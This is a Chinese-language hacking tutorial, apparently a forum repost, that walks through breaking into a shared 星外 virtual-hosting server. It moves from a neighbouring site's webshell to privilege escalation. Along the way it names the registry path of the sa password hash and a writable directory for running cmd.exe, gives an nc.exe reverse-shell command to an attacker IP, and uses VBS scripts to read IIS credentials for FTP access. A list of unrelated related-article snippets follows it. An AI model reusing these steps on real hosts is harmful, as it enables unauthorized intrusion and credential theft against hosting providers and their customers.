首发:www.bhst.org

作者:杀虫剂 qq:395697379

blog:hi.baidu.com/scjhack

T00LS 上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现 多少利用的东西,但是根据些信息知道是星外

对新手来说在这里很容易陷入困境!

星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM \LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.

如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘,很久以前小K(khjl1)给我发了个for命令利用,for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下

for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt  把d:\freehost\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要  很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底。 如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe

命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。

******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试  这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~  C:\Documents and Settings\下有空格所以得用""包含 如:

CmdPath:

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe

Argument:

/c "c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\web\1.vbs

不包含的话会提示失败,所以细节决定成败!

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置 等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的  再结合手上的几个VBS读IIS用户和密码  用读出的密码21端口可以连接 收工!

经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理,其实也很简单的,方便些新手学习  如有不足请提醒

php星外提权大马,谈对星外主机提权利用相关推荐

  1. 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

    一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...

  2. 提权学习之旅——Linux操作系统提权

    首发于先知社区 https://xz.aliyun.com/t/8139 前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 ...

  3. (59.2)【Windows提权】权限等级、PSTools提权、at命令提权、sc命令提权

    目录 一.权限分配 1.1.Windows: 1.2.Linux 二.PSTools提权 2.1.简介: 2.2.微软官网: 2.3.PsExec提权: 三.at命令提权 3.1.原理: 3.2.适用 ...

  4. 星外php mysql_星外PHP多版本安装包 星外PHP多版本安装包

    如果您下载的是DLL文件(如果是其他软件请无视下面的信息): 1.下载后根据您系统的情况选择X86/X64,X86为32位电脑,X64为64位电脑. 如果您不知道是X86还是X64,可以住个尝试. 2 ...

  5. 西部数码php.ini,西部数码虚拟主机提权思路

    当前思路也可用于其他虚拟主机. 说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306 就算修改了也是可以读取ini文件得到加密密码的 mysql 的r ...

  6. API 鉴权插件上线!支持用户自定义鉴权插件

    0.4.0 版本更新主要围绕这几个方面: 分组独立的 UI,支持分组 API 鉴权 API 测试支持继承 API 鉴权 支持用户自定义鉴权插件,仅需部分配置即可发布鉴权插件 开始介绍功能之前,我想先和 ...

  7. 浅谈云函数的代理IP利用面

    浅谈云函数的代理IP利用面 前言 本篇文章介绍如何通过 Serverless(云函数) 实现各种扫描器探测功能,以达到绕过态势感知.WAF等安全设备,增大蓝队研判人员溯源难度,实现封无可封,查无可查的 ...

  8. 服务器不稳定降权多久会恢复,遇到网站降权你会怎么做?

    首先,我们来说说如何判断一个网站被降权: 判断网站降权,我们可以从我们的网站表现来判断,比如说:排名大量的下降,网站索引量大量的下降,网站内容突然不收录,site网站发现首页不在第一位,这些都可以用于 ...

  9. 什么是鉴权?postman的有几种鉴权方式?

     目录 一.什么是鉴权? 二.postman鉴权方式 一.什么是鉴权? 鉴权也就是身份认证,就是验证您是否有权限从服务器访问或操作相关数据.发送请求时,通常必须包含相应的检验参数以确保请求具有访问权限 ...

最新文章

  1. NumPy迎来重大版本更新
  2. 如何安装系统认证签名过的APK
  3. android 消息循环机制--looper handler
  4. 20 个势头最猛的开发者工具
  5. LeetCode 28 实现 strStr()
  6. buidulbs android.jar,在将AS项目迁移到IDEA时,无法将com.android.bui...
  7. HTML+CSS+JS实现 ❤️制作loading动画效果❤️
  8. em算法 实例 正态分布_Petuum提出序列生成学习算法通用框架
  9. mysql 5.1.x 比较 5.6.x版本的日志
  10. linux自动点击软件上的按钮有什么用,教会你Linux Shell自动交互的三种方法
  11. 2017.10.17笔记
  12. 计算机更新bios,win7bios升级教程_win7电脑主板bios升级的方法
  13. wifi信号衰减与距离关系_WIFI信号的空间如何衰减 WIFI信号的空间衰减介绍【详解】...
  14. Leetcode 1284 Minimum Number of Flips to Convert Binary Matrix to Zero Matrix
  15. 国外大牛推荐:计算机专业人士必读好书(30本经典)
  16. 关于 Google play 上架的缺失 64 位版本问题
  17. c语言 end while,C语言报错:error: expected ‘while’ at end of input } ^
  18. Pointnet++中tf_ops三个.so文件的生成
  19. 【云原生 | Kubernetes 系列】----污点与容忍
  20. 西北工业大学明德学院计算机老师,师资队伍结构

热门文章

  1. Moment for Mac v1.3.2 中文版 – 好看的倒数日应用
  2. 百度笔试题--钓鱼比赛
  3. matlab 0阶贝塞尔函数,零阶贝塞尔函数
  4. 用python3 画小猪佩奇
  5. Donchian Channel(唐奇安通道)及其发明人Richard Donchian的前世今生
  6. mysql失物招领系统_java+ssh+mysql高校失物招领系统
  7. 网易邮箱大师获取下载链接时的验证码的分析解决 python
  8. 编程狂人|大型系统存储层迁移实践
  9. java五子棋设计_Java课程设计——五子棋
  10. 清华大学计算机科学博导,冯建华(清华大学计算机科学与技术系教授)